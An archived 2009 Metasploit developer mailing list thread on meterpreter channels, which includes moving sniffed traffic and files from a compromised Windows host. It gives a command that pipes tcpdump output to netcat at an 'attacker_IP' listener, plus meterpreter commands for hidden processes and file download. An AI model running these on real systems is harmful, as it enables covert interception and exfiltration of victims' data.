Metasploit mailing list archives
[framework-hackers] Fwd: Channelized
From: anastasiosm at gmail.com (Anastasios Monachos)
Date: Fri, 13 Feb 2009 06:50:18 +0200
2009/2/12 Bryan Richardson <btricha at gmail.com>
Hi again Anastacios, Quick question... is there anything in the Metasploit Rex library that would allow me to start up a listener similar to netcat directly in Metasploit? This way, I could receive the results of my remote sniffing directly in my program and analyze it in real time...
Not something "off the box" that I am aware of that would fit in your case. But I guess you can code your own auxiliary module so to simply listen for connections on a port and save any incoming data to a file(check the existing auxiliaries capture, the Rex/socket/tcp.rb, tcp_server.rb in msf these might help you) or relay the incoming data to another program - in a sense it is the same as having a nc listener on your pc. Recently HD has added the connect core command that is similar to nc but you can only connect to a compromised host, not listen for incoming connections initiated from your victims, if you are interesting see http://www.metasploit.org/blog/#blog-4 .
Also, I've figured out how to access the channel created for an executed process.
meterpreter > interact channel_id
Do you know of any way I could pipe output from a command I execute on the compromised machine to the channel?
If it is a usual command like a nmap sweep to the whole victim's network, through that compromised machine you can either interact with the channel, or use the channel read command available in meterpreter.
For example, if I run tcpdump on the compromised host, I can read the output of the command via the channel.
Correct, during your interaction with the channel.
However, this output is not in pcap format. In order to get it in pcap format, I have to use the '-w' option to write it to a file in pcap format. I can tell '-w' to write the data in pcap format to stdin using '-' as the value for '-w', then pipe stdin to something like netcat. In turn, I'd like to be able to either pipe the data to the channel
Your sniffer most likely will not output the raw(pcap formatted) captured data on stdout, and if we suppose it does let you do that, there will be lots of gibberish on your screen (you would see the same ugly output as trying to cat a pcap file), so we can conclude that you do need to save the captures in files of pcap format and then somehow transmit them over the attacker's pc for analysis/import to your data viewer. , or pipe it to netcat and hopefully use something in the Rex library to
receive the pcap data...
If you pipe the pcap file to nc you will need a nc listener on the other end (attacker's pc) as you already know. Additionally, you can interact with the channel and use the download command to get the files
What do you think?
Hope I didnt miss the points and didnt confuse you. Any other readers on the list please add your valuable comments --
Thanks! Bryan 2009/2/9 Anastasios Monachos <anastasiosm at gmail.com>2009/2/9 Bryan Richardson <btricha at gmail.com>Thanks Anastasios, So, am I correct in assuming this is how one is dumped into a Windows shell after executing an exploit on a vulnerable Windows machine?Bryan, if I am following you correctly, yes, using the download command supplied by meterpreter payload you can get a file from victim's machine to your machine. Note that in the case of windows you will have to escape the \ with an extra \ when(if) specifying the full path of the file's source and destination, obviously if you do "download file.txt file.txt" it will try to get the file from victim's current directory and save it to your current directory.I was hoping that I could 'channelize' a traffic sniffer such that the sniffed traffic would be sent back to me in real time for real time analysis... it doesn't seem like this is the case.I agree, real-time traffic in some environments really helps the whole task Ultimately, what would be cool is to have my real-time traffic analysissoftware listening on a particular port and have some way of sending the sniffed traffic from the compromised machine to that particular port on my local machine.I think it worths trying piping your live data through nc as we do with dd, but I am not sure if it will work in your case, oh you will have to let your nc traffic pass the firewall. For example: On victim you can try something like: tcpdump -e host victim_ip and port 23 | nc attacker_IP attacker_listening_port On attacker: nc -l -p attacker_listening_port | wireshark -i - Taken from wireshark's man " .... Pipe names should be either the name of a FIFO (named pipe) or ''-'' to read data from the standard input. Data read from pipes must be in standard libpcap format...." Last you may also play with the channel read/write options, so to pass nc's traffic through the channel (?), maybe someone else can reach more light here Let us know what worked and what didnt anyway Tasos-- Bryan On Mon, Feb 9, 2009 at 2:26 PM, Anastasios Monachos < anastasiosm at gmail.com> wrote:2009/2/9 Bryan Richardson <btricha at gmail.com> Hello All,Would someone mind explaining to me what 'channelized' is and how it works?You can use "channelisation" in cases where you wish to work with multiple communication channels that will be tunnelled through one tcp/ip session. Channels are supported by the meterpreter payload, and to channelise you can do: meterpreter > execute -f cmd.exe -H -c //this will execute the file cmd.exe, it will hide the process window and it will channelise the task Process 1234 created. //this is output from meterpreter Channel 2 created.//this is output from meterpreter meterpreter > //now use meterpreter as usual to do your other stuff meterpreter > interact 2 //now interact with channelised cmd.exeI'm wanting to try and use it to send sniffed traffic back to me from a compromised machine that I upload a traffic sniffer to...For already saved captured data you could use the upload/download commands (again from within meterpreter)-- Thanks! Bryan _______________________________________________ Framework-Hackers mailing list Framework-Hackers at spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers-- AM-- AM _______________________________________________ Framework-Hackers mailing list Framework-Hackers at spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers_______________________________________________ Framework-Hackers mailing list Framework-Hackers at spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
-- AM -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090213/50f534c5/attachment.htm>
Current thread:
- [framework-hackers] Channelized Anastasios Monachos (Feb 09)
- Message not available
- Message not available
- [framework-hackers] Fwd: Channelized Anastasios Monachos (Feb 12)
- Message not available
- Message not available